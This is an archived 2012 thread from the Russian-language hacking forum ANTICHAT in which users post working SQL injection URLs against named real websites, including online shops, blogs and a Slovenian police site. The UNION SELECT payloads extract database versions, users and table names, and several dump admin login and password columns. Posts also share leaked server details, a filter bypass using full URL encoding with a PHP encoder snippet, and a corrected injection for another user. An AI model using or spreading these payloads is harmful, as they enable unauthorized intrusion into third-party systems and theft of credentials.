ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.01.2012, 00:04
|
|
Участник форума
Регистрация: 02.02.2010
Сообщений: 107
Провел на форуме:
612028
Репутация:
28
|
|
Код:
Code:
http://www.blog.oss-studio.com.ua/?go=/blog/one&id=-08024530+union+select+1,concat_ws(0x3b,user(),database(),version()),3,4,5,6+--+
best1_blog@91.206.200.121;best1_blog;5.1.56-log |
|
|
15.01.2012, 00:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
74780
Репутация:
33
|
|
Разработка сайтов
Код:
Code:
http://www.kom.su/designsite/site.php?id=-183+union+select+version(),2,3,4%20--
ТиЦ=100
PR = 1
Разработка веб-приложений
Код:
Code:
http://www.it-key.su/site.php?id=-15+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables--
|
|
|
|
15.01.2012, 00:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Сайты - "близнецы" можно сказать )
Сообщение от None
http://www.mainstreetmallonline.com/patterns/listingview.php?ref=15&num=-15274' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,8 7,88,89,90,91,92,93,94,95,96,97,98,concat_ws(0x3a, @@version,user(),database()),100,101,102--+'
Google PR: 3
Version : 5.0.82sp1-log
User: patterns@localhost
Database: patterns
И второй :
Сообщение от None
http://mainstreetvintage.com/listingview.php?ref=21&num=-7804' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,conc at_ws(0x3a,@@version,user(),database()),87,88,89--+'
Google PR: 2
Version: 5.0.82sp1-log
User: vintage@localhost
Database: mainstreetvintage |
|
|
|
15.01.2012, 02:28
|
|
Участник форума
Регистрация: 06.10.2008
Сообщений: 165
Провел на форуме:
355997
Репутация:
66
|
|
Министерство внутренних дел - POLICIJA
Код:
Code:
http://www.policija.si/eng/index.php/index.php?option=com_tiralice&view=tiralicedetail&Itemid=153&kljuc=-167147+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20from%20jos_users--&cr=5169326&v=v_isk&s=ne
joomla@vmysql.policija.si:5.0.67-community-log:joomla_en
GooglePR: 7
|
|
|
|
15.01.2012, 09:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
тИЦ10
Интересная скулья.
Идем по адресу:
Код:
Code:
http://rocich.ru/article.php?sid=48-999.9+union+select+1,version(),3,4,5,6,7--+f
Перенаправляет на:
Код:
Code:
http://www.geoteka.ru/text.html?page=4.0.27-log
--
тИЦ90
Код:
Code:
http://www.auditline.ru/article.php?sid=-639+union+select+1,2,3,version(),5,6,7,8,9--+f
P.S. Я ржал
|
|
|
|
15.01.2012, 18:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
74780
Репутация:
33
|
|
Статусы для контакта, icq
Код:
Code:
http://www.novyestatusy.ru/status.php?id=-3301+union+select+1,2,3,database(),5,6,7,8,9 --
Строительный магазин\фирма
Код:
Code:
http://www.materiauxspecl.com/produit.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,user,pass),18,19,20,21,22,23,24+from+login--
PR = 3
Код:
Code:
http://www.glac.fr/en/produit.php?id=-66+union+select+table_name,2,3+from+information_schema.tables+limit+0,1--
Вывод в title.
PR = 2
Еще один магазин
Код:
Code:
www.maytech.fr/produit.php?id=-124+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass),7,8,9,10,11,12,13,14,15,16+from+users --
PR = 1
Код:
Code:
http://www.boutiquesante.be/produit.php?id=-62+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables--
PR = 3
Магазины
PR = 3
Код:
Code:
http://www.ovadesign.com/site/produit.php?id=-47+union+select+1,2,concat_ws(0x3a,login,password),4,5,6,7,8,9,10,11,12,13+from+user--
PR = 4
Код:
Code:
http://piaggio.ma/piaggio/produit.php?id=-15+union+select+1,concat_ws(0x3a,user,password),3,4,5+from+administration--
PR = 1
Код:
Code:
http://www.agrideal.fr/an/produit.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15%20--
|
|
|
|
16.01.2012, 16:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Защита от peterhost.
Фильтр выглядит как-то так приблизительно:
/union(.*)select/ is
Т.е. срабатывает даже union.php?select =)) не говоря уже о union%0Aselect и т.п. примерам.
Однако это все равно легко обходится «полным» url кодированием.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"' union select"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//$_GET['s'];
[/COLOR][COLOR="#007700"]foreach([/COLOR][COLOR="#0000BB"]str_split[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]) AS[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"])
print[/COLOR][COLOR="#DD0000"]'%'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]bin2hex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
concat_ws(0x3a,database(),version(),user())
Код:
Code:
www.fotodi.ru/books-text.php?id=224%27%20%61%6e%64%20%31%3d%33%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%63%6f%6e%63%61%74%5f%77%73%28%30%78%33%61%2c%64%61%74%61%62%61%73%65%28%29%2c%75%73%65%72%28%29%2c%76%65%72%73%69%6f%6e%28%29%29%2c%39%20%2d%2d%20%31
P.S http://www.fotodi.ru/admin/ Жмакаем «Отмена». Я ржал.
|
|
|
|
17.01.2012, 00:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
74780
Репутация:
33
|
|
тИЦ = 70
PageRank 4
Код:
Code:
http://www.chernyahovsk.su/index.php?cat=-1+union+select+1,concat_ws(0x3a,login,password),3,4+from+auth_user --
|
|
|
|
17.01.2012, 10:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
33429
Репутация:
0
|
|
http://myhomedeco.com/list.php?cat=17&sub=18%20/*!union*/%20select%201,2,3,4,5,6,7,8,9,10,11,Group_Concat(/*!Table_Name*/),13,14,15,16,17,18,19,20,21,22,23,24%20from%20%60 information_schema%60.tables%20where%20table_schem a=database%28%29--%20-
help me, pls!
|
|
|
|
17.01.2012, 10:57
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791
Репутация:
265
|
|
Сообщение от oODungVTOo
oODungVTOo said:
http://myhomedeco.com/list.php?cat=17&sub=18%20/*!union*/%20select%201,2,3,4,5,6,7,8,9,10,11,Group_Concat(/*!Table_Name*/),13,14,15,16,17,18,19,20,21,22,23,24%20from%20%60 information_schema%60.tables%20where%20table_schem a=database%28%29--%20-
help me, pls!
http://myhomedeco.com/list.php?cat=17&sub=18+/*!union+select*/+1,/*!table_name*/,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+ information_schema.tables+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [stranger]](/avatars/avatar113122.jpg?2979560){kind=avatar}
![Отправить сообщение для [stranger] с помощью ICQ](fusion/misc/im_icq.gif)
Линейный вид
